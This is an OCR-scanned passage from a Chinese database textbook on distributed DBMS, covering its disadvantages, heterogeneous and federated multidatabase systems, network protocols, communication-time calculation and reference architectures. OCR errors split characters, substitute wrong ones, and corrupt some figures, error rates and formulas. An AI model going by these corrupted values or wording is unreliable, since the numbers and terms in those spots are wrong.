需要 额外 的 硬件 设备 来 维持 网 络 通信 ， 甚 至 在 管理 和 维护 本 地 DBMS 和 底层 网 络 时 也 需要 
一 定 的 人 力 开销 。 
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安全 性 低 ”在 集中 式 系 统 中 ， 对 数据 的 访问 很 容易 控制 。 而 在 分 布 式 DBMS 中 ， 不仅 
需要 对 各 个 结 点 上 复制 数据 的 访问 进行 控制 ， 而 且 还 要 保证 网 络 本 身 的 安全 。 过 去 往往 认为 
网 络 是 不 安全 的 通信 和 媒介， 今天 虽然 在 某 种 程度 上 这 还 是 事实 ， 但 显然 网 络 的 安全 性 已 大 大 
改善 。 

完整 性 控制 更 困难 “数据库 的 完整 性 就 是 指 存储 数据 的 可 用 性 和 一 致 性 。 完 整 性 通常 用 
一 系列 一 致 性 的 约束 条 件 来 表述 ， 数 据 库 不 能 违反 这 些 规则 。 进 行 完整 性 约束 检查 通常 要 访 
问 大 量 定义 这 些 约 束 用 到 的 但 在 更 新 操作 中 并 未 真正 涉及 的 数据 。 在 分 布 式 DBMS 中 ， 完 整 
性 约束 对 通信 和 处 理 开 销 的 要 求 使 得 它 几乎 不 可 能 实现 。 在 25.4.5 节 中 将 详细 讨论 这 个 问题 。 

缺乏 标准 “分布 式 DBMS 的 实现 基于 有 效 的 通信 网 络 的 支持 ， 但 直到 现在 才 逐 渐 出 现 
了 标准 的 通信 和 数据 访问 协议 。 这 些 标准 的 缺乏 严重 地 限制 了 分 布 式 DBMS 的 发 展 。 而 且 ， 
直到 现在 还 没有 一 种 工具 或 方法 能 将 集中 式 DBMS 转换 为 分 布 式 DBMS。 

缺乏 经 验 ”尽管 人 们 已 经 对 多 用 途 的 分 布 式 DBMS 的 协议 以 及 相关 问题 理解 得 很 透彻 ， 
但 多 用 途 的 分 布 式 DBMS 仍然 没有 被 广泛 地 接受 。 因 此 ， 在 分 布 式 DBMS 方面 所 积累 的 工 
业经 验 与 集中 式 DBMS 无 法 比拟 。 这 些 对 于 未 来 用 户 来 讲 是 个 很 大 的 障碍 。 

数据 库 的 设计 更 加 复杂 分布 式 数据 库 的 设计 除了 要 考虑 集中 式 数 据 库 设 计 所 要 考虑 的 
所 有 问题 之 外 ， 还 要 考虑 到 数据 分 段 、 数 据 段 的 分 配 以 及 数据 复制 。 在 24.4 节 中 将 讨论 这 
些 问题 。 

在 表 24-1 中 对 DDBMS 的 优点 和 缺点 进行 了 总 结 。 


表 24-1 DDBMS 优 缺 点 的 总 结 


优点 缺 ”点 
反映 了 组 织 机 构 的 结构 复杂 性 高 
改进 了 共享 性 和 本 地 自治 性 成 本 高 
改进 了 可 用 性 安全 性 低 
提高 了 可 靠 性 完整 性 控制 更 困难 
改进 了 性 能 缺乏 标准 
节约 成 本 缺乏 经 验 
模块 化 增长 数据 库 设 计 更 加 复杂 
集成 度 高 
保持 竞争 力 


24.1.3 同 构 DDBMS 和 异 构 DDBMS 


DDBMS 可 以 分 为 同 构 和 蜡 构 两 类 。 同 构 系 统 中 ， 所 有 结 点 使 用 相同 的 DBMS 产品 。 
异 构 系 统 中 ， 不 同 结 点 可 能 使 用 不 同 的 DBMS 产品 ， 而 这 些 产 品 不 必 基 于 同一 底层 数据 模 
型 。 因 此 ， 系 统 中 可 能 包含 关系 、 网 状 、 层 次 和 面向 对 象 等 多 种 类 型 的 数据 库 。 

同 构 系统 的 设计 和 管理 相对 简单 得 多 。 这 种 方法 构建 的 系统 具有 很 强 的 可 扩展 性 ， 向 
DDBMS 中 添加 新 的 结 点 也 很 容易 ， 并 且 可 以 通过 开发 多 结 点 的 并 行 处 理 能 力 来 提高 系统 的 
性 能 。 

异 构 系 统 的 形成 通常 是 由 于 系统 中 的 某 些 结 点 在 系统 集成 之 前 已 经 有 了 自己 的 数据 库 。 
在 异 构 系统 中 ,不 同 的 DBMS 之 间 的 通信 必须 要 经 过 翻译 。 为 了 保持 DBMS 的 透明 性 ， 系 
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统 必须 完成 数据 定位 工作 并 进行 一 些 必要 的 翻译 。 有 时 需要 从 其 他 结 点 上 获得 数据 ， 而 这 些 
结 点 可 能 具有 : 

e 不 同 的 硬件 。 

e 不 同 的 DBMS 产品 。 

e 不 同 的 硬件 和 不 同 的 DBMS 产品 。 

如 果 硬 件 不 同 ,但 DBMS 产品 是 一 样 的 ， 翻 译 起 来 会 很 简单 ， 只 要 改变 一 些 代码 和 
字 长 就 可 以 了 。 如 果 DBMS 产品 不 一 样 ， 翻 译 起 来 就 会 复杂 一 些 ， 包 括 将 一 种 数据 模型 
中 的 数据 结构 映射 为 男 一 种 数据 模型 中 对 等 的 数据 结构 。 例 如 ， 把 关系 数据 模型 中 的 关系 
(relation) 映射 为 网 状 数据 模型 中 的 记录 ( record) 和 络 ( set)。 还 需要 翻译 所 用 的 查询 语言 
(例如 ， 将 关系 模型 中 的 SQL SELECT 语句 翻译 为 网 状 模型 中 的 FIND 和 GET 语句)。 如 果 
硬件 和 DBMS 产品 都 不 同 ， 这 两 种 翻译 就 都 是 必需 的 ， 处 理 过 程 也 就 更 加 复杂 。 

若 要 求 公 共 概 念 模式 还 将 带 来 额外 的 复杂 性 ， 公 共 概 念 模式 由 各 个 本 地 的 概念 模式 集 
成 。 在 第 17 章 讨论 逻辑 数据 库 设 计 方 法 学 的 步骤 2.6 中 曾经 讲 过 ， 由 于 语义 的 异 构 性 而 使 
数据 模型 的 集成 变 得 非常 困难 。 例 如 ， 两 种 模式 中 的 同名 属性 很 可 能 是 毫 不 相关 的 两 个 事 
物 。 同 样 ， 名 字 不 同 的 两 个 属性 也 可 能 是 指 同一 事物 。 如 何 检测 和 解决 语义 的 异 构 性 不 在 本 
书 的 讨论 范围 内 ， 有 兴趣 的 读者 可 以 参考 Garcia-Solaco 等 人 (1996 ) 的 论文 。 

作为 异 构 DDBMS 的 一 部 分 ， 某 些 关系 型 系统 通常 采用 网 关 (gateway) 来 将 其 他 不 同 
种 类 的 DBMS 的 语言 和 模型 转换 为 关系 型 的 语言 和 模型 。 但 网 关 有 一 些 严重 的 缺陷 。 首 先 ， 
它 可 能 不 支持 事务 管理 ， 哪 怕 只 是 在 两 个 系统 之 间 。 换 句 话 说， 两 个 系统 之 间 的 网 关 只 是 一 
个 查询 翻译 器 。 例 如 ， 当 一 个 事务 涉及 更 新 这 两 个 数据 库 时 ， 系 统 可 能 就 难以 协同 事务 的 并 
发 控制 和 恢复 。 其 次 ， 使 用 网 关 方法 只 解决 了 将 一 种 语言 中 的 查询 语句 翻译 成 为 另 一 种 语言 
中 对 等 语句 的 问题 。 因 而 它 通 常 不 能 解决 不 同 模式 之 间 结 构 和 表示 的 差异 同 构 化 的 问题 。 
开放 数据 库 访 问 和 互 操 作 

开放 组 (Open Group ) 成 立 了 一 个 规范 工作 组 (SWG) 专门 负责 起 草 开放 数据 库 访问 和 
互 操作 白皮书 。 该 工作 组 的 目标 就 是 提供 规范 ， 或 确保 已 有 及 正在 制定 的 规范 所 创建 的 数据 
库 基 础 环境 包括 以 下 方面 : 

e 强大 、 通 用 的 SQL 应 用 程序 编程 接口 (API)， 使 得 在 客户 端 开 发 应 用 时 无 须知 道 正 

在 访问 的 DBMS 的 提供 商 。 

e 通用 的 数据 库 协 议 ， 使 得 不 同 厂家 生产 的 DBMS 可 直接 通信 ， 而 不 需要 网 关 。 

e 通用 的 网 络 协议 ， 使 得 不 同 的 DBMS 可 以 通信 。 

最 高 的 目标 就 是 不 借助 网 关 事 务 能 跨越 多 个 数据 库 ， 而 这 些 数据 库 可 能 由 不 同 厂商 提供 
的 DBMS 管理 。 该 工作 组 在 制定 分 布 式 关系 数据 库 体 系 结构 (DRDA) 的 第 三 版 时 ， 演 变 为 
数据 库 互 操作 联盟 (DBIOP)， 我 们 将 在 24.5.2 节 简 要 讨论 DRDA。 

多 数据 库 系 统 
在 结束 本 节 的 讨论 之 前 ， 先 简要 地 讨论 一 种 名 叫 多 数据 库 系统 的 特殊 分 布 式 DBMS。 


| 多 数据 库 系 统 (MDBS )| 系统 中 每 个 结 点 都 保持 完全 自治 的 分 布 式 DBMS 。 


近年 来 ， 越 来 越 多 的 人 开始 关注 MDBS， 因 为 它 能 在 本 地 DBMS 完全 控制 自己 操作 的 
前 提 下 将 多 个 独立 的 DDBMS 在 逻辑 上 集成 起 来 。 保 持 完 全 自治 的 一 个 结果 就 是 不 能 对 本 地 
DBMS 进行 任何 软件 修改 。 因 此 ，MDBS 需要 在 本 地 系统 的 顶层 再 建立 一 个 软件 层 来 提供 
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必要 的 功能 。 

MDBS 人 允许 用 户 访问 和 共享 数据 ， 而 不 要 求 完整 的 数据 库 模 式 集成 。 然 而 ， 它 还 允许 
用 户 自己 管理 数据 库 ， 而 不 是 集中 控制 ， 就 像 是 一 个 真正 的 DDBMS 一 样 。 本 地 DBMS 
的 DBA 可 以 通过 指定 一 种 输出 模式 来 授权 对 其 数据 库 指定 部 分 的 访问 ， 这 种 输出 模式 定 
义 了 非 本 地 用 户 可 以 访问 的 数据 库 内 容 。MDBS 可 以 分 为 非 联邦 MDBS (没有 本 地 用 户 的 
MDBS) 和 联邦 MDBS。 联 邦 系统 是 分 布 式 DBMS 和 集中 式 DBMS 的 交叉 : 它 对 于 全 局 用 
户 来 讲 是 分 布 式 的 ， 而 对 于 本 地 用 户 来 讲 又 是 集中 式 的 。 图 24-4 说 明了 DBMS 的 一 种 不 
完全 的 分 类 方式 (也 见 图 26-20 )。 感 兴趣 的 读者 可 以 参考 Sheth and Larson ( 1990 ) 以 及 
Bukhres and Elmagarmid ( 1996 ) 关于 分 布 式 DBMS 的 分 类 。 

简单 地 说 ，MDBS 是 一 种 居于 现存 的 数据 库 和 文件 系统 之 上 的 透明 DBMS， 它 呈现 给 
用 户 的 是 单一 的 数据 库 。MDBS 仅 维护 供用 户 提出 查询 和 更 新 请 求 用 的 全 局 模式 ， 而 所 有 用 
户 数据 则 由 本 地 DBMS 自己 来 维护 。 全 局 模式 是 集成 本 地 数据 库 模 式 而 建立 起 来 的 。 MDBS 
首先 将 全 局 查询 和 更 新 翻译 成 本 地 DBMS 上 的 查询 和 更 新 ， 然 后 再 将 本 地 结果 进行 合并 ， 
最 后 产生 用 户 所 需 的 全 局 结果 。 此 外 ，MDBS 由 处 理 全 局 事务 的 本 地 DBMS 来 协调 该 事务 
的 交付 和 撤销 操作 ， 以 维护 本 地 数据 库 中 数据 的 一 致 性 。MDBS 控制 多 个 网 关 并 通过 这 些 网 
关 来 管理 本 地 数据 库 。 我 们 将 在 24.3.3 节 讨 论 MDBS 的 体系 结构 。 


同 构 同 构 联邦 同 构 
DDBMS, DDBMS MDBS 


A A/ 






分 布 


集中 式 
DBMS 


异 构 异 构 异 构 联邦 
图 24-4 DBMS 集成 方案 分 类 


24.2 ”网 络 概述 


| 网 络 | 能 够 进行 信息 交换 且 具 有 自主 控制 权 的 互 连 计 算 机 集合 。 


计算 机 网 络 是 一 个 复杂 且 变 化 非常 快 的 领域 ,但 其 中 的 部 分 知识 对 于 理解 分 布 式 系统 非 
常 有 帮助 。 几 十 年 前 ， 系 统 都 是 独立 的 ， 而 现在 计算 机 网 络 已 经 无 处 不 在 一 一 从 几 人 台 PC 组 
成 的 小 型 网 络 系统 到 全 世界 范围 内 互 连 的 包含 上 千 台 机 器 甚至 超过 百 万 用 户 的 大 型 网 络 系 
统 。 为 我 们 讨论 方便 起 见 ，DDBMS 建 在 网 络 之 上 ， 但 网 络 对 用 户 不 可 见 。 

通信 网 络 有 多 种 分 类 方法 ， 其 中 一 种 是 根据 计算 机 之 间 的 距离 长 短 来 分 类 的 〈 短 的 叫 局 
域 网 ， 长 的 叫 广域网 )。 局 域 网 (LAN) 主要 用 来 连接 距离 相对 短 的 多 台 机 器 ， 例如， 一 栋 
办 公 楼 内 、 一 所 学 院 或 学 校内 、 一 个 家 庭 内 部 等 。 有 时 一 栋 建 筑 内 有 几 个 LAN， 有 时 一 个 
LAN 又 覆盖 几 栋 建筑 。LAN 通常 由 一 个 组 织 机 构 或 个 人 所 有 、 控 制 和 管理 。LAN 所 用 的 
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互 连 技 术 主 要 是 以 太 网 和 Wi-Fi。 广 域 网 ( WAN) 用 来 连接 距离 很 远 的 多 个 LAN 或 计算 机 。 
最 大 的 WAN 就 是 Internet。 不 像 LAN，WAN 一 般 不 由 单个 组 织 所 有 ， 而 是 在 集体 所 有 、 分 
布 管理 下 运行 。WAN 采用 ATM 、 帧 中 继 、SONET/SDH 和 XX.25 等 技术 互 连 。WAN 的 一 个 
特例 是 城 域 网 (MAN )， 它 主要 履 盖 一 个 城市 或 一 个 地 区 。 

由 于 距离 的 原因 ，WAN 的 通信 链 路 比 LAN 更 慢 、 可 靠 性 更 低 。 通 常情 况 下 ，WAN 的 
数据 传输 速率 范围 从 33.6 Kb/s (通过 调制 解 调 器 拨号 方式 ) 到 45 Mb/s (IT3 非 交 换 专 线 )， 或 
T4 下 的 274 Mb/s。SONET 从 50 Mb/s( OC-1 ) 到 大 约 40 Gb/s (0OC-768 )。LAN 的 传输 速 
率 更 快 一 些 ， 从 10 Mb/s( 共 享 以 太 网 ) 到 2500 Mb/s(ATM)， 并 且 具 有 很 高 的 可 靠 性 。 显 然 ， 
使 用 LAN 进行 通信 的 DDBMS 在 响应 时 间 上 比 用 WAN 进行 通信 的 DDBMS 要 快 得 多 。 

如 果 考 察 路 径 的 选择 方法 ， 即 路 由 ， 可 以 将 网 络 分 为 点 对 点 式 或 广播 式 。 点 对 点 式 网 络 
中 ， 如 果 一 个 结 点 想 把 消息 发 送 给 所 有 结 点 ， 需 要 重复 发 送 多 次 。 而 在 广播 式 网 络 中 ， 所 
有 的 结 点 都 能 收 到 在 网 上 发 布 的 所 有 信息 ,但 每 条 信息 都 有 一 个 前 级 用 来 指明 目标 结 点 ， 
其 他 结 点 便 将 该 消息 忽略 ,WAN 通常 是 基于 点 对 点 网 络 的 ， 而 LAN 通常 使 用 广播 式 网 络 。 
表 24-2 列 出 了 WAN 和 LAN 的 典型 特征 。 


表 24-2 WAN 和 LAN 的 特征 


WAN LAN 
距离 达到 数 百 万 米 距离 为 数 千 米 (WLAN 即 无 线 LAN 在 数 十 米 量 级 ) 
连接 自主 控制 的 计算 机 连接 在 分 布 式 应 用 中 协作 的 计算 机 
由 独立 的 组 织 管理 网 络 (使 用 电话 或 卫星 连接 ) 由 用 户 管 理 网 络 (使 用 私有 的 线 缆 ) 


数据 传输 速率 达到 2500 Mb/s ( ATM)。 快速 以 太 网 
传输 速率 为 100Mb/s。WLAN 通常 为 1 一 108Mb/s， 而 
802.11n 标准 可 达 600 Mb/s 


数据 传输 速率 范围 从 33.6 Kb/s (调制 解 调 器 拨号 
方式 ) 到 45 Mb/s (T3 环 路 ) 


协议 复杂 协议 简单 

使 用 点 对 点 路 由 使 用 广播 路 由 

使 用 不 规则 的 拓扑 结构 使 用 总 线 或 环形 拓扑 
错误 率 约 为 1:10 错误 率 约 为 1:10? 


国际 标准 化 组 织 已 经 制定 了 用 于 管理 系统 之 间 通 信 的 协议 (ISO，1981 )。 该 协议 对 网 
络 进行 了 分 层 ， 每 一 层 为 其 上 一 层 提供 特定 服务 ， 隐 藏 实现 细节 。ISO 开放 系统 互 连 模型 
( Open System Interconnection Model，OSI 模型 ) 包含 七 个 独立 的 层 。 各 层 分 别 负责 通过 
网 络 传输 原始 比特 流 ， 管 理 连 接 并 保障 链 路 中 没有 差错 ， 路 由 并 进行 拥塞 控制 ， 管 理 机 器 间 
的 会 话 以 及 解决 不 同 机 器 的 格式 以 及 数据 表示 之 间 的 差异 。 该 协议 的 具体 描述 对 于 本 章 以 及 
下 一 章 并 不 是 必需 的 ， 有 兴趣 的 读者 可 以 参考 Halsall ( 1995 ) 和 Tanenbaum ( 1996 ) 。 

国际 电话 与 电报 顾问 委员 会 (CCITT) 推出 了 X.25 标准 ， 该 标准 符合 OSI 模型 的 下 三 
层 结构 。 大 部 分 DDBMS 都 是 在 X.25 标准 之 上 开发 的 。 不 过 ， 关 于 上 几 层 的 新 标准 正在 制 
定之 中 ， 例 如 ， 远 程 数据 库 访 问 (RDA)(ISO 9579 ) 或 分 布 式 事务 处 理 (DTP)(ISO 10026 )， 
它们 可 能 会 为 DDBMS 提供 更 多 、 更 有 用 的 服务 。 我 们 将 在 25.5 节 中 研究 X/Open DTP 标 
准 。 作 为 背景 知识 ， 在 此 简要 介绍 一 下 主要 的 网 络 协议 。 


网 络 协议 
| 网 络 协议 | 关于 计算 机 之 间 如 何 发 送 、 翻 译 以 及 处 理 信息 的 一 组 规则 。 
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本 节 将 简要 地 对 主要 的 网 络 协议 进行 描述 。 

TCP/IP (传输 控制 协议 /网 际 协议 ) 这 是 Internet 即 世 界 范围 内 计算 机 网 络 互联 的 标 
准 通信 协议 。TCP 负责 验证 从 客户 端 到 服务 器 端 发 送 数据 的 正确 性 。IP 基于 一 个 4 字 节 的 
目标 地 址 ( 即 IP 地 址 ) 来 提供 路 由 机 制 。IP 地 址 的 首 端 指 示 的 是 地 址 的 网 络 部 分 ， 尾 端 指 
示 的 是 主机 部 分 。IP 地 址 中 网 络 地 址 和 主机 地 址 的 分 界线 是 不 固定 的 。TCP/IP 是 一 种 可 路 
由 协议 ， 意 思 是 说 发 送 的 信息 中 不 但 包含 目标 结 点 的 地 址 ， 而 且 还 包括 目标 网 络 的 地 址 。 
这 使 得 TCP/IP 的 信息 可 以 传送 给 一 个 组 织 机 构 或 世界 各 地 的 多 个 网 络 ， 因 此 该 协议 用 于 
JInternet。 

SPX/IPX (顺序 包 交 换 / 互连网 包 交 换 ) Novell 为 它 的 NetWare 操作 系统 创建 了 SPX/ 
IPX 协议 。 和 TCP 类 似 ， 它 使 用 SPX 协议 作为 信息 发 送 机 制 来 保证 信息 的 完整 性 。IPX 协 
议 处 理 路 由 的 方式 和 卫 协议 类 似 。 和 了 P 协议 不 同 的 是 ，IPX 使 用 80 位 的 地 址 空间 ， 其 中 
32 位 用 来 指示 网 络 部 分 ，48 位 指示 主机 部 分 (这 比 IP 的 32 位 地 址 空间 大 得 多 )。 与 全 不 
同 的 是 ，IPX 协议 不 进行 包 分 割 。 然 而 ，IPX 协议 的 优势 之 一 是 自动 主机 寻 址 。 用 户 可 以 
在 网 络 中 随意 移动 PC， 并 且 简 单 地 插 接 就 可 以 恢复 工作 。 这 对 于 移动 用 户 尤 其 重要 。 直 到 
NetWare 5 之 前 都 是 使 用 SPX/IPX 作为 默认 协议 ， 但 为 了 反映 Internet 的 重要 性 ，NetWare 5 
采用 了 TCP/IP 作为 默认 协议 。 

NetBIOS (网 络 基本 输入 /输出 系统 ) NetBIOS 作为 一 种 PC 应 用 通信 标准 是 由 IBM 
和 Sytek 于 1984 年 开发 出 来 的 。NetBIOS 和 NetBEUI ( NetBIOS 扩展 用 户 协议 ) 原本 被 认 
为 是 同一 个 协议 。 后 来 ， 由 于 NetBIOS 可 以 和 其 他 可 路 由 协议 一 起 使 用 ， 就 把 NetBIOS 分 
离 出 来 ， 现 在 NetBIOS 会 话 可 以 在 NetBIOS 协议 、TCP/IP 和 SPX/IPX 协议 上 进行 传输 。 
NetBEUI 是 一 种 小 型 、 快 速 、 高 效 的 协议 。 但 它 不 可 路 由 ， 所 以 一 种 典型 的 配置 方法 就 是 在 
LAN 内 部 使 用 NetBEUI 协议 进行 通信 ， 而 在 LAN 外 部 使 用 TCP/IP 进行 通信 。 

APPC (高 级 程序 到 程序 的 通信 ) 由 IBM 推出 的 一 种 高 级 通信 协议 ， 可 以 允许 程序 通 
过 网 络 相互 作用 。 它 提供 一 个 跨 IBM 所 有 平台 的 通用 编程 接口 来 支持 客户 - 服务 器 和 分 布 
式 计 算 。 它 提供 若干 命令 用 于 管理 会 话 、 收 发 数据 和 采用 两 段 式 提 交 (将 在 下 一 章 中 讨论 ) 
的 事务 管理 。APPC 软件 在 所 有 IBM 操作 系统 和 许多 非 [BM 操作 系统 中 部 分 可 用 或 可 选择 
使 用 。 因 为 APPC 只 支持 IBM 系统 网 络 结构 ， 而 这 种 网 络 结构 又 是 用 LU 6.2 建立 会 话 的 ， 
所 以 有 时 APPC 和 LU 6.2 被 认为 是 同义词 。 

DECnet DECnet 是 Digital 公司 的 可 路 由 通信 协议 ， 它 支持 以 太 网 样式 的 LAN 和 基 
带 ， 以 及 专用 或 公用 的 宽带 WAN。 它 能 将 PDP、VAX、PC、Mac 和 工作 站 互 连 。 

AppleTalk 这 是 由 Apple 公司 于 1985 年 推出 的 LAN 可 路 由 协议 ， 它 支持 Apple 公司 
专 有 的 LocalTalk 访问 方式 ， 也 支持 以 太 网 和 令 牌 环 网 。 所 有 的 Macintosh 和 LaserWriter 都 
内 建 了 AppleTalk 网 络 管理 器 和 LocalTalk 访问 方式 。 后 来 Apple 已 用 TCP/IP 取而代之 。 

WAP (无 线 应 用 协议 ) 这 是 一 种 为 蜂 窜 电话、 寻呼机 和 其 他 手持 设备 提供 的 标准 ， 使 
这 些 手 持 设备 能 安全 访问 E-mail 和 基于 文本 的 网 页 。WAP 由 Phone.com (以 前 的 Unwired 
Planet)、Ericsson、Motorola 和 Nokia 等 公司 于 1997 年 提出 ， 它 提供 了 一 个 完整 的 无 线 应 用 
环境 ,包括 与 TCP/IP 相应 的 无 线 协议 和 诸如 呼叫 控制 和 电话 本 访问 的 电话 集成 框架 。 
通信 时 间 

发 送 一 条 信息 花费 的 时 间 取 决 于 信息 的 长 度 和 所 使 用 的 网 络 类 型 。 可 以 用 以 下 公式 来 
计算 : 
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通信 时 间 二 Co 十 (信息 位 数 /传输 速率 ) 
其 中 ，Co 是 固定 的 用 来 初始 化 信息 的 时 间 耗 费 ， 称 为 访问 延 时 。 例 如 ， 假 设 访问 延 时 为 1s， 
传输 速率 为 10 000b/s， 发 送 100 000 个 记录 ， 每 个 记录 100 位 ,那么 所 花费 的 时 间 就 是 : 
通信 时 间 三 1 十 (100 000X100/10 000 ) ==1001s 
如 果 和 希望 一 次 只 传送 一 个 记录 ， 那 么 传送 100 000 个 记录 所 花费 的 时 间 就 是 : 
通信 时 间 三 100 000X[1 十 (100/10 000) ]=100 000X[1.01] 王 101 000s 

显然 ， 由 于 访问 延 时 ， 分离 地 传送 100 000 个 记录 所 需 的 时 间 长 得 多 。 因 此 , DDBMS 
的 目标 就 是 既 要 减 小 发 送 数 据 的 容量 ， 又 要 减少 发 送 次 数 。 这 个 问题 将 在 24.5.3 节 中 讨论 分 
布 式 查询 优化 时 再 详细 说 明 。 


24.3 DDBMS 的 功能 和 体系 结构 


在 第 2 章 中 介绍 了 集中 式 DBMS 的 功能 、 体 系 结构 和 组 成 。 本 节 将 考虑 分 布 是 如 何 影 
响 期 望 的 功能 和 体系 结构 的 。 


24.3.1 DDBMS 的 功能 


我 们 期 望 DDBMS 至 少 应 该 具有 在 第 2 章 中 已 讨论 的 集中 式 DBMS 的 所 有 功能 。 另 外 ， 
还 希望 增加 以 下 功能 : 

e 扩展 通信 服务 以 提供 对 远程 结 点 的 访问 ， 并 允许 通过 网 络 在 各 结 点 间 传 送 查 询 和 
数据 。 
扩展 系统 目录 以 存储 数据 分 布 的 细节 。 
分 布 式 查询 处 理 ， 包 括 查询 优化 和 远程 数据 访问 。 
扩展 安全 控制 机 制 ， 以 维护 适合 于 分 布 式 数据 的 授权 /访问 权限 。 
扩展 并 发 控制 机 制 ， 以 维护 分 布 式 数据 和 复制 的 数据 的 一 致 性 。 
扩展 恢复 机 制 ， 以 防 出 现 由 于 个 别 结 点 的 故障 或 通信 链 路 故障 使 整个 系统 崩溃 的 
情况 。 
在 第 25 章 中 将 进一步 讨论 这 些 问 题 。 


24.3.2 DDBMS 的 参考 体系 结构 


在 2.1 节 中 介绍 的 ANSI-SPARC 的 DBMS 三 级 体系 结构 为 集中 式 DBMS 提供 了 参考 体 
系 结构 。 由 于 分 布 式 DBMS 的 多 样 性 ， 很 难 给 出 一 个 普遍 适用 的 、 统 一 的 分 布 式 DBMS 体 
系 结构 。 然 而 ， 给 出 一 个 考虑 了 数据 分 布 的 可 能 的 参考 体系 结构 仍然 有 用 。 图 24-5 所 示 的 
参考 体系 结构 由 下 列 模式 组 成 : 

。 一 组 全 局 外 部 模式 。 

。 一 个 全 局 概念 模式 。 

。 一 个 分 段 模式 和 一 个 分 配 模式 。 

e@ 每 个 本 地 DBMS 上 符合 ANSI-SPARC 三 级 结构 的 一 组 模式 。 

该 图 的 边 代 表 不 同 模式 之 间 的 映射 。 根 据 所 支持 的 透明 性 级 别 的 不 同 ， 该 结构 中 某 些 层 
次 可 能 不 复 存 在 。 

全 局 概念 模式 
全 局 概念 模式 是 整个 数据 库 的 逻辑 描述 ， 就 好 像 它 没 被 分 布 一 样 。 这 个 级 别 对 应 于 
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ANSI-SPARC 体系 结构 的 概念 级 ， 包 含 了 对 于 实体 、 联 系 、 约 束 、 安 全 以 及 完整 性 信息 的 定 
义 。 它 提供 分 布 式 环境 中 的 物理 数据 独立 性 。 而 全 局 外 部 模式 提供 逻辑 数据 独立 性 。 
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图 24-5 DDBMS 的 参考 体系 结构 


分 段 模式 和 分 配 模式 

分 段 模式 描述 数据 如 何 进行 逻辑 划分 。 分 配 模 式 考虑 在 复制 情况 下 数据 存放 的 位 置 。 
本 地 模式 

每 一 个 本 地 DBMS 都 有 自己 的 一 些 模式 。 本 地 概念 模式 和 本 地 内 部 模式 分 别 对 应 于 
ANSI-SPARC 体系 结构 的 相应 级 别 。 本 地 映射 模式 将 分 配 模式 中 的 段 映 射 为 本 地 数据 库 的 外 
部 对 象 。 这 独立 于 DBMS ， 也 是 支持 异 构 DBMS 的 基础 。 


24.3.3 联邦 MDBS 的 参考 体系 结构 


在 24.1.3 节 中 简要 地 讨论 了 联邦 多 数据 库 系 统 (FMDBS)。 联 邦 系统 在 所 提供 的 本 地 自 
治 性 级 别 上 和 DDBMS 有 所 不 同 。 这 种 差异 在 参考 体系 结构 上 也 有 所 反映 。 图 24-6 给 出 了 
紧 耦 合 FMDBS 的 一 种 参考 体系 结构 ， 就 是 说 ， 它 具有 一 个 全 局 概念 模式 (GCS)。DDBMS 
中 ，GCS 是 所 有 本 地 概念 模式 的 联合 。 而 在 FMDBS 中 ，GCS 是 本 地 概念 模式 的 一 个 子 集 ， 
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包含 每 个 本 地 系统 同意 共享 出 来 的 数据 。 紧 耦合 系统 的 GCS 或 者 是 部 分 本 地 概念 模式 的 集 
成 ， 或 者 是 本 地 外 部 模式 的 集成 。 


Si LE > 





24-6” 紧 耦合 FMDBS 的 参考 体系 结构 


有 人 认为 FMDBS 不 应 该 具有 GCS (Litwin，1988 )， 这 种 系统 被 称 为 松散 耦合 的 。 这 
种 情况 下 ， 外 部 模式 由 一 个 或 多 个 本 地 概念 模式 组 成 。 可 以 参考 Litwin ( 1988 )、Sheth 和 
Larson ( 1990 )， 了 解 更 多 关于 MDBS 的 信息 。 


24.3.4 DDBMS 的 组 成 结构 


不 考虑 上 面 给 出 的 参考 体系 结构 ， 也 可 以 假定 DDBMS 主要 由 以 下 四 个 部 分 组 成 : 

e 本 地 DBMS (LDBMS) 组 件 。 

e 数据 通信 (DC) 组 件 。 

e 全 局 系统 目录 (GSC)。 

e 分 布 式 DBMS (DDBMS) 组 件 。 

图 24-7 说 明了 一 个 基于 图 24-1 的 DDBMS 的 组 成 结构 。 为 了 清楚 起 见 ， 图 中 去 掉 了 结 
点 2 和 4， 因 为 它们 的 结构 和 结 点 1 完全 相同 。 
本 地 DBMS 组 件 

本 地 DBMS 是 标准 的 DBMS， 负 责 控 制 每 个 拥有 数据 库 的 结 点 上 的 本 地 数据 。 它 具 
有 自己 的 本 地 系统 目录 ， 用 来 存储 该 结 点 中 所 存 数 据 的 信息 。 在 同 构 系统 中 ， 每 一 个 结 点 
的 本 地 DBMS 组 件 是 相同 的 。 在 异 构 系 统 中 ， 至 少 有 两 个 结 点 使 用 不 同 的 DBMS 产品 或 
平台 。 
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图 24-7 DDBMS 的 组 件 


数据 通信 组 件 

数据 通信 组 件 是 使 所 有 结 点 都 能 互相 通信 的 软件 。 数 据 通信 组 件 包含 结 点 和 链 路 信息 。 
全 局 系统 目录 

GSC 和 集中 式 系统 的 系统 目录 具有 相同 的 功能 。GSC 包含 能 够 表明 系统 分 布 式 本 质 的 
信息 ， 如 分 段 、 复 制 和 分 配方 案 。 它 本 身 就 可 以 看 作 一 个 分 布 式 数据 库 ， 因 为 它 就 和 其 他 关 
系 一 样 ， 可 以 分 段 、 分 布 、 完 全 复制 或 集中 ， 下 面 将 对 此 进行 讨论 。 完 全 复制 的 GSC 对 结 
点 自治 性 的 影响 是 ， 对 于 GSC 的 任何 修改 都 必须 通知 到 分 布 式 系统 中 的 所 有 结 点 。 集 中 式 
的 GSC 也 会 影响 结 点 的 自治 性 ， 并 且 它 对 中 心 结 点 的 故障 更 为 敏感 。 

分 布 式 系统 R* 采取 的 方法 克服 了 这 些 问 题 ( Williams 等 人 ，1982 )。R* 的 每 一 个 结 点 
中 都 有 一 个 本 地 目录 ， 包 含 了 与 存在 该 结 点 中 的 数据 相关 的 元 数据 。 对 于 在 某 个 结 点 上 创建 
的 关系 〈 该 结 点 被 称 为 该 关系 的 出 生 结 点 )， 该 结 点 的 本 地 目录 负责 记录 该 关系 的 每 个 分 段 
的 定义 、 每 个 分 段 的 每 一 个 副本 的 定义 ， 以 及 每 个 分 段 或 副本 所 在 的 位 置 。 一 旦 分 段 或 副本 
转移 到 了 其 他 位 置 ， 其 对 应 关系 的 出 生 结 点 上 的 本 地 目录 就 进行 相应 修改 。 这 样 ， 要 定位 一 
个 关系 的 某 个 分 段 或 副本 ， 就 必须 访问 该 关系 的 出 生 结 点 。 全 局 关系 的 出 生 结 点 在 每 一 个 本 
